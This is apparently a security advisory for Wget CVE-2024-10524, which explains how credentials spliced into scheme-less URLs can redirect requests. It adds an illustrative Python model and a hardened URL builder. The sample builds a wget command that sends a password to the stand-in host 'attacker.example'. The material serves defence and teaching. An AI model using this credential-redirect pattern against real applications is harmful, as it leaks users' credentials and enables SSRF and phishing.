Wget · Wget · CVE-2024-10524
Name of the Vulnerable Software and Affected Versions:
Wget versions prior to 1.25.0
Description:
The issue lies in Wget's handling of shorthand URLs, that is, URLs given without an explicit scheme such as http:// or ftp://, which Wget completes by guessing the scheme and splitting the host from the port or path at the first ':'. Applications that invoke Wget with such a shorthand URL and splice user-supplied credentials into it (user:password@host/path) are affected: because the first ':' then falls inside the credentials rather than after the host, crafted credentials change which host Wget connects to, so an attacker can make Wget send the request, together with the embedded credentials, to a host of their choosing. Depending on how the application uses the fetched content, this enables Server-Side Request Forgery (SSRF), phishing, or Man-in-the-Middle (MitM) attacks.
Recommendations:
For versions prior to 1.25.0, update to Wget 1.25.0 or later to mitigate the risk.
As a temporary workaround, always pass Wget a complete URL with an explicit scheme, never a shorthand one, and percent-encode or reject credential values that contain URL delimiters (':', '@', '/') so that they cannot shift the host boundary. Better still, keep credentials out of the URL entirely by supplying them through Wget's --user and --password options.
Limit which code paths can invoke Wget with user-controlled input, and verify after building the URL that its host is still the intended one before running the command.
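The following is an added example (not Wget's code, and not code from the advisory) that models the shorthand rewrite behind this issue and shows the hardened way to build the URL an application hands to Wget. The function rewrite_shorthand is an approximation of how Wget before 1.25.0 completed a scheme-less URL (split at the first ':' or '/', all-digit port means http://, any other host:path means ftp://host/path, bare host/path means http://); it is stated here as an assumption for illustration and is not the original C implementation. The host names, credentials and paths are constructed sample input.

```python
"""Model of Wget's pre-1.25.0 shorthand URL rewrite (assumption), a wrapper
that reproduces the vulnerable pattern, and a hardened URL builder."""
import re
import shlex
from urllib.parse import quote, urlsplit

_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def rewrite_shorthand(url: str) -> str:
    """Approximation (assumption) of the pre-1.25.0 rewrite of a URL that has
    no scheme: the first ':' or '/' decides the interpretation."""
    if _SCHEME_RE.match(url):
        return url  # explicit scheme: nothing to guess
    m = re.search(r"[:/]", url)
    if m is None:
        return "http://" + url  # bare host -> HTTP
    i = m.start()
    if i == 0 or url.startswith("://", i):
        return url  # nothing the shorthand logic would rewrite
    if url[i] == ":":
        rest = url[i + 1:]
        port, _, _ = rest.partition("/")
        if port and port.isdigit():
            return "http://" + url  # host:port[/path] -> HTTP
        return "ftp://" + url[:i] + "/" + rest  # host:path -> FTP
    return "http://" + url  # host/path -> HTTP


def wget_target_host(url: str) -> str:
    """Host that the modelled Wget would actually connect to."""
    return urlsplit(rewrite_shorthand(url)).hostname or ""


def vulnerable_command(user: str, password: str, host: str, path: str) -> str:
    """The pattern the advisory warns about: user-supplied credentials spliced
    into a scheme-less URL. The first ':' now sits between user and password,
    so the modelled rewrite turns the *user* field into the host and pushes
    'password@host/path' into the FTP path sent to that host."""
    shorthand = f"{user}:{password}@{host}/{path}"
    return "wget " + shlex.quote(shorthand)


def safe_url(user: str, password: str, host: str, path: str,
             scheme: str = "https") -> str:
    """Hardened construction: explicit scheme (no shorthand guessing),
    percent-encoded userinfo so ':' '@' '/' in credentials cannot become
    delimiters, and a re-parse check that the host survived unchanged."""
    userinfo = quote(user, safe="") + ":" + quote(password, safe="")
    url = f"{scheme}://{userinfo}@{host}/{path.lstrip('/')}"
    parsed = urlsplit(url)
    if parsed.scheme != scheme or parsed.hostname != host.lower():
        raise ValueError("host or scheme changed while building the URL")
    return url


if __name__ == "__main__":
    # Constructed sample: the attacker controls only the username.
    cmd = vulnerable_command("attacker.example", "s3cret",
                             "files.example.com", "report.pdf")
    print(cmd)
    print("modelled target host:",
          wget_target_host("attacker.example:s3cret@files.example.com/report.pdf"))
    print("hardened URL:",
          safe_url("attacker.example", "s3cret", "files.example.com", "report.pdf"))
```

Under the modelled rewrite, even a benign username is treated as the host, so the request never reaches files.example.com; with an attacker-chosen username the request (and the password, now part of the path) goes to the attacker's server instead. safe_url keeps the host boundary fixed and refuses to return a URL whose parsed host differs from the intended one; passing credentials via --user/--password avoids the problem of credentials inside the URL altogether.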